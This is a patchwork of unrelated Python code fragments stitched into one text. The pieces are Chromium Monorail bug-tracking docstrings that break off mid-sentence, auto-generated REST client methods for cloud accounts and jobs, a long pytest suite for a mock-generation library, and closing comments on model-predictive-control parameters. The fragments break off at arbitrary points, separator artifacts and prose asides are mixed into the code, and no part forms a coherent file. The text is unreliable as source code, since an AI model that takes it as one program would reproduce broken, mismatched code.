"""Gets the name of the Monorail project the issue is for.
Returns:
A string representing the Monorail project.
"""
return 'chromium'
def GetPreviousTrackingBugId(self):
"""Gets the id of the previous issue that was tracking this flaky test.
Returns:
A string representing the Id of the issue.
"""
return self._previous_tracking_bug_id
def SetPreviousTrackingBugId(self, previous_tracking_bug_id):
"""Sets the id of the previous issue that was tracking this flaky test.
Args:
previous_tracking_bug_id: Id of the | |
[]
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/cloud/settings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CloudSettings', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_cloud_access(self, **kwargs): # noqa: E501
"""list_cloud_access # noqa: E501
List all accessible cluster identifiers. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_access(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudAccessExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_cloud_access_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_cloud_access_with_http_info(**kwargs) # noqa: E501
return data
def list_cloud_access_with_http_info(self, **kwargs): # noqa: E501
"""list_cloud_access # noqa: E501
List all accessible cluster identifiers. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_access_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudAccessExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'limit', 'dir'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_cloud_access" % key
)
params[key] = val
del params['kwargs']
if ('sort' in params and
len(params['sort']) > 255):
raise ValueError("Invalid value for parameter `sort` when calling `list_cloud_access`, length must be less than or equal to `255`") # noqa: E501
if ('sort' in params and
len(params['sort']) < 0):
raise ValueError("Invalid value for parameter `sort` when calling `list_cloud_access`, length must be greater than or equal to `0`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_cloud_access`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_cloud_access`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_cloud_access`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/cloud/access', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CloudAccessExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_cloud_accounts(self, **kwargs): # noqa: E501
"""list_cloud_accounts # noqa: E501
List all accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_accounts(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudAccountsExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_cloud_accounts_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_cloud_accounts_with_http_info(**kwargs) # noqa: E501
return data
def list_cloud_accounts_with_http_info(self, **kwargs): # noqa: E501
"""list_cloud_accounts # noqa: E501
List all accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_accounts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudAccountsExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'limit', 'dir'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_cloud_accounts" % key
)
params[key] = val
del params['kwargs']
if ('sort' in params and
len(params['sort']) > 255):
raise ValueError("Invalid value for parameter `sort` when calling `list_cloud_accounts`, length must be less than or equal to `255`") # noqa: E501
if ('sort' in params and
len(params['sort']) < 0):
raise ValueError("Invalid value for parameter `sort` when calling `list_cloud_accounts`, length must be greater than or equal to `0`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_cloud_accounts`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_cloud_accounts`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_cloud_accounts`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/4/cloud/accounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CloudAccountsExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_cloud_jobs(self, **kwargs): # noqa: E501
"""list_cloud_jobs # noqa: E501
List all cloudpools jobs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_jobs(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudJobsExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_cloud_jobs_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_cloud_jobs_with_http_info(**kwargs) # noqa: E501
return data
def list_cloud_jobs_with_http_info(self, **kwargs): # noqa: E501
"""list_cloud_jobs # noqa: E501
List all cloudpools jobs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cloud_jobs_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:return: CloudJobsExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params | |
validity of generated mocks code
exec(generated +
"\nmock_b64decode.return_value.decode.return_value = '20'")
w_mock = tests.sample.code.tested_module.base_64_partial_functions(
"my msg2")
assert "20" == w_mock
def test_generate_mocks_function_list_comprehension(mocker):
wo_mock = get_square_root([1, 4, 9])
assert [1, 2, 3] == wo_mock # without mocks
expected = """# mocked dependencies
mock_sqrt = mocker.MagicMock(name='sqrt')
mocker.patch('tests.sample.code.comprehensions_and_loops.math.sqrt', new=mock_sqrt)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_sqrt, name='mock_sqrt')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK, get_square_root)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated +
"\nmock_sqrt.side_effect = [-1]*len('not a list of numbers')")
w_mock = get_square_root('not a list of numbers')
assert [-1] * len('not a list of numbers') == w_mock
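As an aside (not part of the original tests), assigning a list to `side_effect` makes a `MagicMock` return the items one call at a time, which is how the `exec()` above forces the mocked `sqrt` to yield -1 for every input:

```python
from unittest.mock import MagicMock

m = MagicMock(name='sqrt')
m.side_effect = [-1, -1]  # consumed one element per call
assert m(1) == -1 and m(4) == -1
```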
def test_generate_mocks_function_list_comprehension_external_variable(mocker):
wo_mock = get_square_root_external_variable()
assert [1, 2, 3] == wo_mock # without mocks
expected = """# mocked dependencies
mock_sqrt = mocker.MagicMock(name='sqrt')
mocker.patch('tests.sample.code.comprehensions_and_loops.math.sqrt', new=mock_sqrt)
mock_external_items = mocker.MagicMock(name='external_items')
mocker.patch('tests.sample.code.comprehensions_and_loops.external_items', new=mock_external_items)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_sqrt, name='mock_sqrt')
mock_autogen.generate_asserts(mock_external_items, name='mock_external_items')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
get_square_root_external_variable)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated +
"\nmock_sqrt.side_effect = [-1]*len('not a list of numbers')"
"\nmock_external_items.__iter__.return_value = [9, 16, 25, 36]")
w_mock = get_square_root_external_variable()
assert [-1] * 4 == w_mock  # we changed the number of items in the external list
def test_generate_mocks_lock_external_variable(mocker, capsys):
with_statements.single_thread_dict = {}
wo_mock = with_statements.outside_lock_context("some", "value")
assert "value" == wo_mock # without mocks
wo_mock = with_statements.outside_lock_context("some", "other value")
assert "value" == wo_mock # without mocks
expected = """# mocked dependencies
mock_lock = mocker.MagicMock(name='lock')
mocker.patch('tests.sample.code.with_statements.lock', new=mock_lock)
mock_single_thread_dict = mocker.MagicMock(name='single_thread_dict')
mocker.patch('tests.sample.code.with_statements.single_thread_dict', new=mock_single_thread_dict)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_lock, name='mock_lock')
mock_autogen.generate_asserts(mock_single_thread_dict, name='mock_single_thread_dict')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
with_statements.outside_lock_context)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec("\n".join(generated_mocks) +
"\nmock_single_thread_dict.__contains__.return_value = False"
"\nmock_single_thread_dict.__getitem__.return_value = 'strange'")
w_mock = with_statements.outside_lock_context("some", "third value")
assert 'strange' == w_mock
capsys.readouterr().out # this clears the existing output
exec("\n".join(generated_asserts))
expected_mock_results = """mock_lock.__enter__.assert_called_once_with()
mock_lock.__exit__.assert_called_once_with(None, None, None)
mock_single_thread_dict.__contains__.assert_called_once_with('some')
mock_single_thread_dict.__setitem__.assert_called_once_with('some', 'third value')
mock_single_thread_dict.__getitem__.assert_called_once_with('some')
"""
assert expected_mock_results == capsys.readouterr().out
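The asserts above rely on `MagicMock` pre-configuring the dunder protocol methods, so one mock can stand in for both the lock (a context manager) and the dict. A self-contained illustration (not part of the original test module):

```python
from unittest.mock import MagicMock

lock = MagicMock(name='lock')
with lock:          # drives __enter__ / __exit__ on the mock
    pass
lock.__enter__.assert_called_once_with()

d = MagicMock(name='d')
d.__contains__.return_value = False
assert 'key' not in d            # routed through d.__contains__('key')
d.__contains__.assert_called_once_with('key')
```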
def test_generate_mocks_function_dict_comprehension(mocker):
expected = """# mocked dependencies
mock_len = mocker.MagicMock(name='len')
mocker.patch('tests.sample.code.comprehensions_and_loops.len', new=mock_len)
mock_items = mocker.MagicMock(name='items')
mocker.patch('tests.sample.code.comprehensions_and_loops.os.environ.items', new=mock_items)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_len, name='mock_len')
mock_autogen.generate_asserts(mock_items, name='mock_items')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
summarize_environ_values)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated + "\nmock_len.side_effect = range(3)" +
"\nmock_items.return_value = (('a','b'), ('c','d'), ('e','f'),)")
w_mock = summarize_environ_values()
assert {'a': 0, 'c': 1, 'e': 2} == w_mock
def test_generate_mocks_function_dict_comprehension_ignore_variables(mocker):
expected = """# mocked dependencies
mock_len = mocker.MagicMock(name='len')
mocker.patch('tests.sample.code.comprehensions_and_loops.len', new=mock_len)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_len, name='mock_len')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK, trimmed_strings)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated + "\nmock_len.return_value = 20")
w_mock = trimmed_strings(["a", "bb", "cc "])
assert {'a': 20, 'cc': 20, 'bb': 20} == w_mock
def test_generate_mocks_function_subscript(mocker):
expected = """# mocked dependencies
mock_sqrt = mocker.MagicMock(name='sqrt')
mocker.patch('tests.sample.code.subscripts.math.sqrt', new=mock_sqrt)
mock_randint = mocker.MagicMock(name='randint')
mocker.patch('tests.sample.code.subscripts.random.randint', new=mock_randint)
mock_str = mocker.MagicMock(name='str')
mocker.patch('tests.sample.code.subscripts.str', new=mock_str)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_sqrt, name='mock_sqrt')
mock_autogen.generate_asserts(mock_randint, name='mock_randint')
mock_autogen.generate_asserts(mock_str, name='mock_str')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
list_subscript_games)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated + "\nmock_sqrt.return_value = 0" +
"\nmock_randint.return_value = 0" + "\nmock_str.return_value = '7'")
my_list = [1, 2, 3, 4, 5]
list_subscript_games(my_list)
assert [-1, '7', 5] == my_list
def test_generate_mocks_function_same_function_name_different_objects(mocker):
wo_mock = get_username_and_password()
assert "some_username,some_password" == wo_mock # without mocks
expected = """# mocked dependencies
mock_get = mocker.MagicMock(name='get')
mocker.patch('tests.sample.code.same_method_name.get', new=mock_get)
mock_get_2 = mocker.MagicMock(name='get_2')
mocker.patch('tests.sample.code.same_method_name.os.environ.get', new=mock_get_2)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_get, name='mock_get')
mock_autogen.generate_asserts(mock_get_2, name='mock_get_2')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
get_username_and_password)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated + "\nmock_get.return_value = 'made_up_username'"
"\nmock_get_2.return_value = 'made_up_password'")
w_mock = get_username_and_password()
assert 'made_up_username,made_up_password' == w_mock
def test_generate_mocks_method_inner_calls(mocker):
bin_op_class_name = 'ast.BinOp' if sys.version_info >= (
3, 9) else '_ast.BinOp'
global_before = tests.sample.code.tested_module.global_counter
prop_before = tests.sample.code.tested_module.FirstClass.prop
first = tests.sample.code.tested_module.FirstClass('20')
expected = f"""# warnings
# could not convert a function call into a mock on node:
# (suffix.upper() + suffix).encode('ascii')
# Can't stringify node of type <class '{bin_op_class_name}'>
# mocked dependencies
mock_randint = mocker.MagicMock(name='randint')
mocker.patch('tests.sample.code.tested_module.random.randint', new=mock_randint)
mock_get_random_number = mocker.MagicMock(name='get_random_number')
mocker.patch('tests.sample.code.tested_module.get_random_number', new=mock_get_random_number)
mock_str = mocker.MagicMock(name='str')
mocker.patch('tests.sample.code.tested_module.str', new=mock_str)
mock_isfile = mocker.MagicMock(name='isfile')
mocker.patch('tests.sample.code.tested_module.os.path.isfile', new=mock_isfile)
mock_b64encode = mocker.MagicMock(name='b64encode')
mocker.patch('base64.b64encode', new=mock_b64encode)
mock_b64decode = mocker.MagicMock(name='b64decode')
mocker.patch('base64.b64decode', new=mock_b64decode)
mock_increase_global_counter = mocker.MagicMock(name='increase_global_counter')
mocker.patch('tests.sample.code.tested_module.FirstClass.increase_global_counter', new=mock_increase_global_counter)
mock_increase_class_counter = mocker.MagicMock(name='increase_class_counter')
mocker.patch('tests.sample.code.tested_module.FirstClass.increase_class_counter', new=mock_increase_class_counter)
mock_not_implemented = mocker.MagicMock(name='not_implemented')
mocker.patch('tests.sample.code.tested_module.FirstClass.not_implemented', new=mock_not_implemented)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_randint, name='mock_randint')
mock_autogen.generate_asserts(mock_get_random_number, name='mock_get_random_number')
mock_autogen.generate_asserts(mock_str, name='mock_str')
mock_autogen.generate_asserts(mock_isfile, name='mock_isfile')
mock_autogen.generate_asserts(mock_b64encode, name='mock_b64encode')
mock_autogen.generate_asserts(mock_b64decode, name='mock_b64decode')
mock_autogen.generate_asserts(mock_increase_global_counter, name='mock_increase_global_counter')
mock_autogen.generate_asserts(mock_increase_class_counter, name='mock_increase_class_counter')
mock_autogen.generate_asserts(mock_not_implemented, name='mock_not_implemented')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
first.using_not_implemented)
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
# don't compare warning code since python version might be less than 3.8
assert expected_warnings[0:2] == generated_warnings[0:2]
if sys.version_info >= (3, 8):
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
exec(generated) # verify the validity of generated mocks code
first.using_not_implemented()
assert global_before == tests.sample.code.tested_module.global_counter
assert prop_before == tests.sample.code.tested_module.FirstClass.prop
exec("mock_not_implemented.assert_called_once()")
def test_generate_mocks_static_method_inner_calls(mocker):
global_before = tests.sample.code.tested_module.global_counter
prop_before = tests.sample.code.tested_module.FirstClass.prop
first = tests.sample.code.tested_module.FirstClass('20')
expected = """# mocked dependencies
mock_get_random_number = mocker.MagicMock(name='get_random_number')
mocker.patch('tests.sample.code.tested_module.get_random_number', new=mock_get_random_number)
mock_staticmethod = mocker.MagicMock(name='staticmethod')
mocker.patch('tests.sample.code.tested_module.staticmethod', new=mock_staticmethod)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_get_random_number, name='mock_get_random_number')
mock_autogen.generate_asserts(mock_staticmethod, name='mock_staticmethod')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated_mocks_function = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
first.increase_global_counter)
generated_mocks_function_from_class = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
tests.sample.code.tested_module.FirstClass.increase_global_counter)
assert generated_mocks_function == generated_mocks_function_from_class
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(
generated_mocks_function)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated_mocks_function +
f"\nmock_get_random_number.return_value = {global_before}")
first.increase_global_counter()
assert global_before == tests.sample.code.tested_module.global_counter
assert prop_before == tests.sample.code.tested_module.FirstClass.prop
exec("mock_get_random_number.assert_called_once()")
def test_generate_mocks_class_method_inner_calls(mocker):
global_before = tests.sample.code.tested_module.global_counter
prop_before = tests.sample.code.tested_module.FirstClass.prop
first = tests.sample.code.tested_module.FirstClass('20')
expected = """# mocked dependencies
mock_get_random_number = mocker.MagicMock(name='get_random_number')
mocker.patch('tests.sample.code.tested_module.get_random_number', new=mock_get_random_number)
mock_increase_global_counter = mocker.MagicMock(name='increase_global_counter')
mocker.patch('tests.sample.code.tested_module.FirstClass.increase_global_counter', new=mock_increase_global_counter)
mock_classmethod = mocker.MagicMock(name='classmethod')
mocker.patch('tests.sample.code.tested_module.classmethod', new=mock_classmethod)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_get_random_number, name='mock_get_random_number')
mock_autogen.generate_asserts(mock_increase_global_counter, name='mock_increase_global_counter')
mock_autogen.generate_asserts(mock_classmethod, name='mock_classmethod')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated_mocks_function = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
first.increase_class_counter)
generated_mocks_function_from_class = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
tests.sample.code.tested_module.FirstClass.increase_class_counter)
assert generated_mocks_function == generated_mocks_function_from_class
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(
generated_mocks_function)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated_mocks_function +
f"\nmock_get_random_number.return_value = {prop_before}")
first.increase_class_counter()
assert global_before == tests.sample.code.tested_module.global_counter
assert prop_before == tests.sample.code.tested_module.FirstClass.prop
exec("mock_get_random_number.assert_called_once()")
exec("mock_increase_global_counter.assert_called_once()")
def test_generate_asserts_are_in_same_folder_args(mock_everything_collection):
tests.sample.code.tested_module.are_in_same_folder('/some/path/file1.txt',
'/some/path/file2.txt')
mock_are_in_same_folder = mock_everything_collection.are_in_same_folder
generated = mock_autogen.generator.generate_asserts(
mock_are_in_same_folder)
assert 'assert 1 == mock_are_in_same_folder.call_count\n' \
"mock_are_in_same_folder.assert_called_once_with(" \
"'/some/path/file1.txt', '/some/path/file2.txt')\n" == generated
exec(generated) # verify the validity of assertions
def test_generate_asserts_rename_argument(mock_everything_collection):
tests.sample.code.tested_module.are_in_same_folder('/some/path/file1.txt',
'/some/path/file2.txt')
mock_are_in_same_folder = mock_everything_collection.are_in_same_folder
generated = mock_autogen.generator.generate_asserts(
mock_are_in_same_folder, name='my_mock')
assert 'assert 1 == my_mock.call_count\n' \
"my_mock.assert_called_once_with(" \
"'/some/path/file1.txt', '/some/path/file2.txt')\n" == generated
def test_generate_asserts_unable_to_find_argument(mock_everything_collection):
tests.sample.code.tested_module.are_in_same_folder('/some/path/file1.txt',
'/some/path/file2.txt')
generated = mock_autogen.generator.generate_asserts(
mock_everything_collection.are_in_same_folder)
assert 'assert 1 == arg.call_count\n' \
"arg.assert_called_once_with(" \
"'/some/path/file1.txt', '/some/path/file2.txt')\n" == generated
def test_generate_asserts_mocks_were_not_called(mock_everything_collection):
for mocked in mock_everything_collection:
generated = mock_autogen.generator.generate_asserts(mocked)
assert "mocked.assert_not_called()" == generated
exec(generated)
def test_generate_asserts_are_in_same_folder_kwargs(
mock_functions_only_collection):
tests.sample.code.tested_module.are_in_same_folder(
path1='/some/path/file1.txt', path2='/some/path/file2.txt')
mock_are_in_same_folder = mock_functions_only_collection.are_in_same_folder
generated = mock_autogen.generator.generate_asserts(
mock_are_in_same_folder)
assert "assert 1 == mock_are_in_same_folder.call_count\n" \
"mock_are_in_same_folder.assert_called_once_with(" \
"path1='/some/path/file1.txt', " \
"path2='/some/path/file2.txt')\n" == generated
exec(generated) # verify the validity of assertions
def test_generate_asserts_are_in_same_folder_mix_args_kwargs(
mock_everything_collection):
tests.sample.code.tested_module.are_in_same_folder(
'/some/path/file1.txt', path2='/some/path/file2.txt')
mock_are_in_same_folder = mock_everything_collection.are_in_same_folder
generated = mock_autogen.generator.generate_asserts(
mock_are_in_same_folder)
assert "assert 1 == mock_are_in_same_folder.call_count\n" \
"mock_are_in_same_folder.assert_called_once_with(" \
"'/some/path/file1.txt', " \
"path2='/some/path/file2.txt')\n" == generated
exec(generated) # verify the validity of assertions
def test_generate_asserts_rm_alias_builtin_only(mock_builtin_only_collection):
tests.sample.code.tested_module.rm_alias('/some/path/file1.txt')
mock_os_remove = mock_builtin_only_collection.os_remove
generated = mock_autogen.generator.generate_asserts(mock_os_remove)
assert "assert 1 == mock_os_remove.call_count\n" \
"mock_os_remove.assert_called_once_with('/some/path/file1.txt')\n" \
== generated
exec(generated) # verify the validity of assertions
def test_generate_asserts_append_to_cwd_builtin_only(
mock_modules_only_collection):
tests.sample.code.tested_module.append_to_cwd('/some/path/file1.txt')
mock_os = mock_modules_only_collection.os
generated = mock_autogen.generator.generate_asserts(mock_os)
assert re.match(
r"^mock_os.getcwd.assert_called_once_with\(\)\n"
r"mock_os.path.join.assert_called_once_with"
r"\(<MagicMock name='os.getcwd\(\)' id='\d+'>, "
r"'/some/path/file1.txt'\)\n$", generated)
# added ANY to match the mock parameter
from mock import ANY
mock_os.path.join.assert_called_once_with(ANY, '/some/path/file1.txt')
mock_os.getcwd.assert_called_once_with()
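When a recorded call contains another mock (like the `os.getcwd()` result above), it cannot be matched literally; `unittest.mock.ANY` compares equal to anything and stands in for it. A small sketch of the pattern:

```python
# Sketch: ANY equals any object, so it can match call arguments that are
# themselves mocks -- the pattern used for mock_os.path.join above.
from unittest.mock import MagicMock, ANY

mock_os = MagicMock(name='os')
mock_os.path.join(mock_os.getcwd(), '/some/path/file1.txt')

# the first argument is itself a MagicMock, so match it with ANY
mock_os.path.join.assert_called_once_with(ANY, '/some/path/file1.txt')
mock_os.getcwd.assert_called_once_with()
```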
def test_generate_asserts_append_to_cwd_builtin_only_mocked_cwd(
mock_modules_only_collection):
mock_os = mock_modules_only_collection.os
# added this so the assert can be effective.
# this is an example of the code the user has to add on top of the utility
mock_os.getcwd.return_value = '/some/pwd'
tests.sample.code.tested_module.append_to_cwd('/some/path/file1.txt')
| |
(n_states)x1 ndarrays e.g. [[2.], [4.], [3.14]]
# n_states, n_controls: number of states and controls
# N: horizon
# T: time step
# lbg, lbx, ubg, ubx: lower and upper (l,u) state and input (x,g) bounds
